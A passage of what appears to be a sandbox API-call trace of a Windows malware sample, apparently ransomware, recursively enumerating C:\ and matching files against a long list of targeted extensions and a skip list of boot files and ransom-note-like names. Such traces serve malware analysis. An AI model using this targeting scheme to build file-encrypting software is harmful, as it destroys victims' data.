(lpString1=".html", lpString2="p.ini") returned -1 [0032.654] lstrlenW (lpString=".icb") returned 4 [0032.654] lstrcmpiW (lpString1=".icb", lpString2=".ini") returned -1 [0032.654] lstrlenW (lpString=".ics") returned 4 [0032.654] lstrcmpiW (lpString1=".ics", lpString2=".ini") returned -1 [0032.654] lstrlenW (lpString=".iff") returned 4 [0032.654] lstrcmpiW (lpString1=".iff", lpString2=".ini") returned -1 [0032.654] lstrlenW (lpString=".inc") returned 4 [0032.654] lstrcmpiW (lpString1=".inc", lpString2=".ini") returned -1 [0032.654] lstrlenW (lpString=".indd") returned 5 [0032.654] lstrcmpiW (lpString1=".indd", lpString2="p.ini") returned -1 [0032.654] lstrlenW (lpString=".ini") returned 4 [0032.654] lstrcmpiW (lpString1=".ini", lpString2=".ini") returned 0 [0032.654] lstrlenW (lpString="desktop.ini") returned 11 [0032.654] lstrlenW (lpString=".dqb") returned 4 [0032.654] lstrcmpiW (lpString1=".dqb", lpString2=".ini") returned -1 [0032.654] lstrlenW (lpString="desktop.ini") returned 11 [0032.654] lstrcmpiW (lpString1="boot.ini", lpString2="desktop.ini") returned -1 [0032.654] lstrcmpiW (lpString1="bootfont.bin", lpString2="desktop.ini") returned -1 [0032.654] lstrcmpiW (lpString1="ntldr", lpString2="desktop.ini") returned 1 [0032.654] lstrcmpiW (lpString1="ntdetect.com", lpString2="desktop.ini") returned 1 [0032.655] lstrcmpiW (lpString1="io.sys", lpString2="desktop.ini") returned 1 [0032.655] lstrcmpiW (lpString1="RETURN FILES.txt", lpString2="desktop.ini") returned 1 [0032.655] lstrcmpiW (lpString1="Info.hta", lpString2="desktop.ini") returned 1 [0032.655] lstrcmpiW (lpString1="ivttvf.exe", lpString2="desktop.ini") returned 1 [0032.655] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini") returned 74 [0032.655] FindNextFileW (in: hFindFile=0x661de0, lpFindFileData=0x33ff808 | out: lpFindFileData=0x33ff808*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x81, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0032.655] FindClose (in: hFindFile=0x661de0 | out: hFindFile=0x661de0) returned 1 [0032.655] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x39206d0 | out: hHeap=0x570000) returned 1 [0032.655] FindNextFileW (in: hFindFile=0x660d98, lpFindFileData=0x33ffa84 | out: lpFindFileData=0x33ffa84*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb63e4b00, ftLastAccessTime.dwHighDateTime=0x1d337f4, ftLastWriteTime.dwLowDateTime=0xb63e4b00, ftLastWriteTime.dwHighDateTime=0x1d337f4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="S-1-5-21-3388679973-3930757225-3770151564-1000", cAlternateFileName="S-1-5-~1")) returned 0 [0032.655] FindClose (in: hFindFile=0x660d98 | out: hFindFile=0x660d98) returned 1 [0032.655] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x39106c8 | out: hHeap=0x570000) returned 1 [0032.655] FindNextFileW (in: hFindFile=0x5c1018, lpFindFileData=0x33ffd00 | out: lpFindFileData=0x33ffd00*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1002f, dwReserved1=0x0, cFileName="Boot", cAlternateFileName="")) returned 1 [0032.655] lstrlenW (lpString="C:\\Boot") returned 7 [0032.655] lstrcmpiW (lpString1="C:\\Windows", lpString2="C:\\Boot") returned 1 [0032.655] lstrlenW (lpString="Boot") returned 4 [0032.655] lstrcmpiW (lpString1="C:\\Windows", lpString2="Boot") returned 1 [0032.655] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xfffe) returned 0x39106c8 [0032.655] lstrlenW (lpString="C:\\Boot") returned 7 [0032.655] FindFirstFileW (in: lpFileName="C:\\Boot\\*", lpFindFileData=0x33ffa84 | out: lpFindFileData=0x33ffa84*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x661da0 [0032.655] FindNextFileW (in: hFindFile=0x661da0, lpFindFileData=0x33ffa84 | out: lpFindFileData=0x33ffa84*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0032.655] FindNextFileW (in: hFindFile=0x661da0, lpFindFileData=0x33ffa84 | out: lpFindFileData=0x33ffa84*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac2e8a60, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x2ebf9340, ftLastAccessTime.dwHighDateTime=0x1d4d597, ftLastWriteTime.dwLowDateTime=0x2ebf9340, ftLastWriteTime.dwHighDateTime=0x1d4d597, nFileSizeHigh=0x0, nFileSizeLow=0x6000, dwReserved0=0x0, dwReserved1=0x0, cFileName="BCD", cAlternateFileName="")) returned 1 [0032.655] lstrlenW (lpString="BCD") returned 3 [0032.656] lstrlenW (lpString=".1cd") returned 4 [0032.656] lstrcmpiW (lpString1=".1cd", lpString2="") returned 1 [0032.656] lstrlenW (lpString=".3ds") returned 4 [0032.656] lstrcmpiW (lpString1=".3ds", lpString2="") returned 1 [0032.656] lstrlenW (lpString=".3fr") returned 4 [0032.656] lstrcmpiW (lpString1=".3fr", lpString2="") returned 1 [0032.656] lstrlenW (lpString=".3g2") returned 4 [0032.656] lstrcmpiW (lpString1=".3g2", lpString2="") returned 1 [0032.656] lstrlenW (lpString=".3gp") returned 4 [0032.656] lstrcmpiW (lpString1=".3gp", lpString2="") returned 1 [0032.656] lstrlenW (lpString=".7z") returned 3 [0032.656] lstrcmpiW (lpString1=".7z", lpString2="BCD") returned -1 [0032.656] lstrlenW (lpString=".accda") returned 6 [0032.656] lstrcmpiW (lpString1=".accda", lpString2="") returned 1 [0032.656] lstrlenW (lpString=".accdb") returned 6 [0032.656] lstrcmpiW (lpString1=".accdb", lpString2="") returned 1 [0032.656] lstrlenW (lpString=".accdc") returned 6 [0032.656] lstrcmpiW (lpString1=".accdc", lpString2="") returned 1 [0032.656] lstrlenW (lpString=".accde") returned 6 [0032.656] lstrcmpiW (lpString1=".accde", lpString2="") returned 1 [0032.656] lstrlenW (lpString=".accdt") returned 6 [0032.656] lstrcmpiW (lpString1=".accdt", lpString2="") returned 1 [0032.656] lstrlenW (lpString=".accdw") returned 6 [0032.656] lstrcmpiW (lpString1=".accdw", lpString2="") returned 1 [0032.656] lstrlenW (lpString=".adb") returned 4 [0032.656] lstrcmpiW (lpString1=".adb", lpString2="") returned 1 [0032.656] lstrlenW (lpString=".adp") returned 4 [0032.656] lstrcmpiW (lpString1=".adp", lpString2="") returned 1 [0032.656] lstrlenW (lpString=".ai") returned 3 [0032.656] lstrcmpiW (lpString1=".ai", lpString2="BCD") returned -1 [0032.656] lstrlenW (lpString=".ai3") returned 4 [0032.656] lstrcmpiW (lpString1=".ai3", lpString2="") returned 1 [0032.656] lstrlenW (lpString=".ai4") returned 4 [0032.656] lstrcmpiW (lpString1=".ai4", lpString2="") returned 1 [0032.656] lstrlenW (lpString=".ai5") returned 4 [0032.656] lstrcmpiW (lpString1=".ai5", lpString2="") returned 1 [0032.657] lstrlenW (lpString=".ai6") returned 4 [0032.657] lstrcmpiW (lpString1=".ai6", lpString2="") returned 1 [0032.657] lstrlenW (lpString=".ai7") returned 4 [0032.657] lstrcmpiW (lpString1=".ai7", lpString2="") returned 1 [0032.657] lstrlenW (lpString=".ai8") returned 4 [0032.657] lstrcmpiW (lpString1=".ai8", lpString2="") returned 1 [0032.657] lstrlenW (lpString=".anim") returned 5 [0032.657] lstrcmpiW (lpString1=".anim", lpString2="") returned 1 [0032.657] lstrlenW (lpString=".arw") returned 4 [0032.657] lstrcmpiW (lpString1=".arw", lpString2="") returned 1 [0032.657] lstrlenW (lpString=".as") returned 3 [0032.657] lstrcmpiW (lpString1=".as", lpString2="BCD") returned -1 [0032.657] lstrlenW (lpString=".asa") returned 4 [0032.657] lstrcmpiW (lpString1=".asa", lpString2="") returned 1 [0032.657] lstrlenW (lpString=".asc") returned 4 [0032.657] lstrcmpiW (lpString1=".asc", lpString2="") returned 1 [0032.657] lstrlenW (lpString=".ascx") returned 5 [0032.657] lstrcmpiW (lpString1=".ascx", lpString2="") returned 1 [0032.657] lstrlenW (lpString=".asm") returned 4 [0032.657] lstrcmpiW (lpString1=".asm", lpString2="") returned 1 [0032.657] lstrlenW (lpString=".asmx") returned 5 [0032.657] lstrcmpiW (lpString1=".asmx", lpString2="") returned 1 [0032.657] lstrlenW (lpString=".asp") returned 4 [0032.657] lstrcmpiW (lpString1=".asp", lpString2="") returned 1 [0032.657] lstrlenW (lpString=".aspx") returned 5 [0032.657] lstrcmpiW (lpString1=".aspx", lpString2="") returned 1 [0032.657] lstrlenW (lpString=".asr") returned 4 [0032.657] lstrcmpiW (lpString1=".asr", lpString2="") returned 1 [0032.657] lstrlenW (lpString=".asx") returned 4 [0032.657] lstrcmpiW (lpString1=".asx", lpString2="") returned 1 [0032.657] lstrlenW (lpString=".avi") returned 4 [0032.657] lstrcmpiW (lpString1=".avi", lpString2="") returned 1 [0032.657] lstrlenW (lpString=".avs") returned 4 [0032.657] lstrcmpiW (lpString1=".avs", lpString2="") returned 1 [0032.657] lstrlenW (lpString=".backup") returned 7 [0032.657] lstrcmpiW (lpString1=".backup", lpString2="") returned 1 [0032.657] lstrlenW (lpString=".bak") returned 4 [0032.658] lstrcmpiW (lpString1=".bak", lpString2="") returned 1 [0032.658] lstrlenW (lpString=".bay") returned 4 [0032.658] lstrcmpiW (lpString1=".bay", lpString2="") returned 1 [0032.658] lstrlenW (lpString=".bd") returned 3 [0032.658] lstrcmpiW (lpString1=".bd", lpString2="BCD") returned -1 [0032.658] lstrlenW (lpString=".bin") returned 4 [0032.658] lstrcmpiW (lpString1=".bin", lpString2="") returned 1 [0032.658] lstrlenW (lpString=".bmp") returned 4 [0032.658] lstrcmpiW (lpString1=".bmp", lpString2="") returned 1 [0032.658] lstrlenW (lpString=".bz2") returned 4 [0032.658] lstrcmpiW (lpString1=".bz2", lpString2="") returned 1 [0032.658] lstrlenW (lpString=".c") returned 2 [0032.658] lstrcmpiW (lpString1=".c", lpString2="CD") returned -1 [0032.658] lstrlenW (lpString=".cdr") returned 4 [0032.658] lstrcmpiW (lpString1=".cdr", lpString2="") returned 1 [0032.658] lstrlenW (lpString=".cer") returned 4 [0032.658] lstrcmpiW (lpString1=".cer", lpString2="") returned 1 [0032.658] lstrlenW (lpString=".cf") returned 3 [0032.658] lstrcmpiW (lpString1=".cf", lpString2="BCD") returned -1 [0032.658] lstrlenW (lpString=".cfc") returned 4 [0032.658] lstrcmpiW (lpString1=".cfc", lpString2="") returned 1 [0032.658] lstrlenW (lpString=".cfm") returned 4 [0032.658] lstrcmpiW (lpString1=".cfm", lpString2="") returned 1 [0032.658] lstrlenW (lpString=".cfml") returned 5 [0032.658] lstrcmpiW (lpString1=".cfml", lpString2="") returned 1 [0032.658] lstrlenW (lpString=".cfu") returned 4 [0032.658] lstrcmpiW (lpString1=".cfu", lpString2="") returned 1 [0032.658] lstrlenW (lpString=".chm") returned 4 [0032.658] lstrcmpiW (lpString1=".chm", lpString2="") returned 1 [0032.658] lstrlenW (lpString=".cin") returned 4 [0032.659] lstrcmpiW (lpString1=".cin", lpString2="") returned 1 [0032.659] lstrlenW (lpString=".class") returned 6 [0032.659] lstrcmpiW (lpString1=".class", lpString2="") returned 1 [0032.659] lstrlenW (lpString=".clx") returned 4 [0032.659] lstrcmpiW (lpString1=".clx", lpString2="") returned 1 [0032.659] lstrlenW (lpString=".config") returned 7 [0032.659] lstrcmpiW (lpString1=".config", lpString2="") returned 1 [0032.659] lstrlenW (lpString=".cpp") returned 4 [0032.659] lstrcmpiW (lpString1=".cpp", lpString2="") returned 1 [0032.659] lstrlenW (lpString=".cr2") returned 4 [0032.659] lstrcmpiW (lpString1=".cr2", lpString2="") returned 1 [0032.659] lstrlenW (lpString=".crt") returned 4 [0032.659] lstrcmpiW (lpString1=".crt", lpString2="") returned 1 [0032.659] lstrlenW (lpString=".crw") returned 4 [0032.659] lstrcmpiW (lpString1=".crw", lpString2="") returned 1 [0032.659] lstrlenW (lpString=".cs") returned 3 [0032.659] lstrcmpiW (lpString1=".cs", lpString2="BCD") returned -1 [0032.659] lstrlenW (lpString=".css") returned 4 [0032.659] lstrcmpiW (lpString1=".css", lpString2="") returned 1 [0032.659] lstrlenW (lpString=".csv") returned 4 [0032.659] lstrcmpiW (lpString1=".csv", lpString2="") returned 1 [0032.659] lstrlenW (lpString=".cub") returned 4 [0032.659] lstrcmpiW (lpString1=".cub", lpString2="") returned 1 [0032.659] lstrlenW (lpString=".dae") returned 4 [0032.659] lstrcmpiW (lpString1=".dae", lpString2="") returned 1 [0032.659] lstrlenW (lpString=".dat") returned 4 [0032.659] lstrcmpiW (lpString1=".dat", lpString2="") returned 1 [0032.659] lstrlenW (lpString=".db") returned 3 [0032.659] lstrcmpiW (lpString1=".db", lpString2="BCD") returned -1 [0032.659] lstrlenW (lpString=".dbf") returned 4 [0032.659] lstrcmpiW (lpString1=".dbf", lpString2="") returned 1 [0032.659] lstrlenW (lpString=".dbx") returned 4 [0032.659] lstrcmpiW (lpString1=".dbx", lpString2="") returned 1 [0032.659] lstrlenW (lpString=".dc3") returned 4 [0032.659] lstrcmpiW (lpString1=".dc3", lpString2="") returned 1 [0032.659] lstrlenW (lpString=".dcm") returned 4 [0032.659] lstrcmpiW (lpString1=".dcm", lpString2="") returned 1 [0032.660] lstrlenW (lpString=".dcr") returned 4 [0032.660] lstrcmpiW (lpString1=".dcr", lpString2="") returned 1 [0032.660] lstrlenW (lpString=".der") returned 4 [0032.660] lstrcmpiW (lpString1=".der", lpString2="") returned 1 [0032.660] lstrlenW (lpString=".dib") returned 4 [0032.660] lstrcmpiW (lpString1=".dib", lpString2="") returned 1 [0032.660] lstrlenW (lpString=".dic") returned 4 [0032.660] lstrcmpiW (lpString1=".dic", lpString2="") returned 1 [0032.660] lstrlenW (lpString=".dif") returned 4 [0032.660] lstrcmpiW (lpString1=".dif", lpString2="") returned 1 [0032.660] lstrlenW (lpString=".divx") returned 5 [0032.660] lstrcmpiW (lpString1=".divx", lpString2="") returned 1 [0032.660] lstrlenW (lpString=".djvu") returned 5 [0032.660] lstrcmpiW (lpString1=".djvu", lpString2="") returned 1 [0032.660] lstrlenW (lpString=".dng") returned 4 [0032.660] lstrcmpiW (lpString1=".dng", lpString2="") returned 1 [0032.660] lstrlenW (lpString=".doc") returned 4 [0032.660] lstrcmpiW (lpString1=".doc", lpString2="") returned 1 [0032.660] lstrlenW (lpString=".docm") returned 5 [0032.660] lstrcmpiW (lpString1=".docm", lpString2="") returned 1 [0032.660] lstrlenW (lpString=".docx") returned 5 [0032.660] lstrcmpiW (lpString1=".docx", lpString2="") returned 1 [0032.660] lstrlenW (lpString=".dot") returned 4 [0032.660] lstrcmpiW (lpString1=".dot", lpString2="") returned 1 [0032.660] lstrlenW (lpString=".dotm") returned 5 [0032.660] lstrcmpiW (lpString1=".dotm", lpString2="") returned 1 [0032.660] lstrlenW (lpString=".dotx") returned 5 [0032.660] lstrcmpiW (lpString1=".dotx", lpString2="") returned 1 [0032.660] lstrlenW (lpString=".dpx") returned 4 [0032.660] lstrcmpiW (lpString1=".dpx", lpString2="") returned 1 [0032.660] lstrlenW (lpString=".dqy") returned 4 [0032.660] lstrcmpiW (lpString1=".dqy", lpString2="") returned 1 [0032.660] lstrlenW (lpString=".dsn") returned 4 [0032.660] lstrcmpiW (lpString1=".dsn", lpString2="") returned 1 [0032.660] lstrlenW (lpString=".dt") returned 3 [0032.660] lstrcmpiW (lpString1=".dt", lpString2="BCD") returned -1 [0032.660] lstrlenW (lpString=".dtd") returned 4 [0032.661] lstrcmpiW (lpString1=".dtd", lpString2="") returned 1 [0032.661] lstrlenW (lpString=".dwg") returned 4 [0032.661] lstrcmpiW (lpString1=".dwg", lpString2="") returned 1 [0032.661] lstrlenW (lpString=".dwt") returned 4 [0032.661] lstrcmpiW (lpString1=".dwt", lpString2="") returned 1 [0032.661] lstrlenW (lpString=".dx") returned 3 [0032.661] lstrcmpiW (lpString1=".dx", lpString2="BCD") returned -1 [0032.661] lstrlenW (lpString=".dxf") returned 4 [0032.661] lstrcmpiW (lpString1=".dxf", lpString2="") returned 1 [0032.661] lstrlenW (lpString=".edml") returned 5 [0032.661] lstrcmpiW (lpString1=".edml", lpString2="") returned 1 [0032.661] lstrlenW (lpString=".efd") returned 4 [0032.661] lstrcmpiW (lpString1=".efd", lpString2="") returned 1 [0032.661] lstrlenW (lpString=".elf") returned 4 [0032.661] lstrcmpiW (lpString1=".elf", lpString2="") returned 1 [0032.661] lstrlenW (lpString=".emf") returned 4 [0032.661] lstrcmpiW (lpString1=".emf", lpString2="") returned 1 [0032.661] lstrlenW (lpString=".emz") returned 4 [0032.661] lstrcmpiW (lpString1=".emz", lpString2="") returned 1 [0032.661] lstrlenW (lpString=".epf") returned 4 [0032.661] lstrcmpiW (lpString1=".epf", lpString2="") returned 1 [0032.661] lstrlenW (lpString=".eps") returned 4 [0032.661] lstrcmpiW (lpString1=".eps", lpString2="") returned 1 [0032.661] lstrlenW (lpString=".epsf") returned 5 [0032.661] lstrcmpiW (lpString1=".epsf", lpString2="") returned 1 [0032.661] lstrlenW (lpString=".epsp") returned 5 [0032.661] lstrcmpiW (lpString1=".epsp", lpString2="") returned 1 [0032.661] lstrlenW (lpString=".erf") returned 4 [0032.661] lstrcmpiW (lpString1=".erf", lpString2="") returned 1 [0032.661] lstrlenW (lpString=".exr") returned 4 [0032.661] lstrcmpiW (lpString1=".exr", lpString2="") returned 1 [0032.661] lstrlenW (lpString=".f4v") returned 4 [0032.661] lstrcmpiW (lpString1=".f4v", lpString2="") returned 1 [0032.661] lstrlenW (lpString=".fido") returned 5 [0032.661] lstrcmpiW (lpString1=".fido", lpString2="") returned 1 [0032.662] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xfffe) returned 0x39206d0 [0032.662] FindFirstFileW (in: lpFileName="C:\\Boot\\cs-CZ\\*", lpFindFileData=0x33ff808 | out: lpFindFileData=0x33ff808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac015040, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x662de8 [0032.693] FindNextFileW (in: hFindFile=0x662de8, lpFindFileData=0x33ff808 | out: lpFindFileData=0x33ff808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac015040, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0032.698] FindNextFileW (in: hFindFile=0x662de8, lpFindFileData=0x33ff808 | out: lpFindFileData=0x33ff808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c50, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0032.698] FindClose (in: hFindFile=0x662de8 | out: hFindFile=0x662de8) returned 1 [0032.698] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x39206d0 | out: hHeap=0x570000) returned 1 [0032.698] FindNextFileW (in: hFindFile=0x661da0, lpFindFileData=0x33ffa84 | out: lpFindFileData=0x33ffa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="da-DK", cAlternateFileName="")) returned 1 [0032.698] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xfffe) returned 0x39206d0 [0032.698] FindFirstFileW (in: lpFileName="C:\\Boot\\da-DK\\*", lpFindFileData=0x33ff808 | out: lpFindFileData=0x33ff808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x662de8 [0032.698] FindNextFileW (in: hFindFile=0x662de8, lpFindFileData=0x33ff808 | out: lpFindFileData=0x33ff808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0032.698] FindNextFileW (in: hFindFile=0x662de8, lpFindFileData=0x33ff808 | out: lpFindFileData=0x33ff808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0032.698] FindClose (in: hFindFile=0x662de8 | out: hFindFile=0x662de8) returned 1 [0032.699] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x39206d0 | out: hHeap=0x570000) returned 1 [0032.699] FindNextFileW (in: hFindFile=0x661da0, lpFindFileData=0x33ffa84 | out: lpFindFileData=0x33ffa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="de-DE", cAlternateFileName="")) returned 1 [0032.699] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xfffe) returned 0x39206d0 [0032.699] FindFirstFileW (in: lpFileName="C:\\Boot\\de-DE\\*", lpFindFileData=0x33ff808 | out: lpFindFileData=0x33ff808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x662de8 [0032.699] FindNextFileW (in: hFindFile=0x662de8, lpFindFileData=0x33ff808 | out: lpFindFileData=0x33ff808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0032.699] FindNextFileW (in: hFindFile=0x662de8, lpFindFileData=0x33ff808 | out: lpFindFileData=0x33ff808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8132526, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16640, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0032.699] FindClose (in: hFindFile=0x662de8 | out: hFindFile=0x662de8) returned 1 [0032.699] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x39206d0 | out: hHeap=0x570000) returned 1 [0032.699] FindNextFileW (in: hFindFile=0x661da0, lpFindFileData=0x33ffa84 | out: lpFindFileData=0x33ffa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="el-GR", cAlternateFileName="")) returned 1 [0032.699] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xfffe) returned 0x39206d0 [0032.699] FindFirstFileW (in: lpFileName="C:\\Boot\\el-GR\\*", lpFindFileData=0x33ff808 | out: lpFindFileData=0x33ff808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x662de8 [0032.699] FindNextFileW (in: hFindFile=0x662de8, lpFindFileData=0x33ff808 | out: lpFindFileData=0x33ff808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0032.699] FindNextFileW (in: hFindFile=0x662de8, lpFindFileData=0x33ff808 | out: lpFindFileData=0x33ff808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, 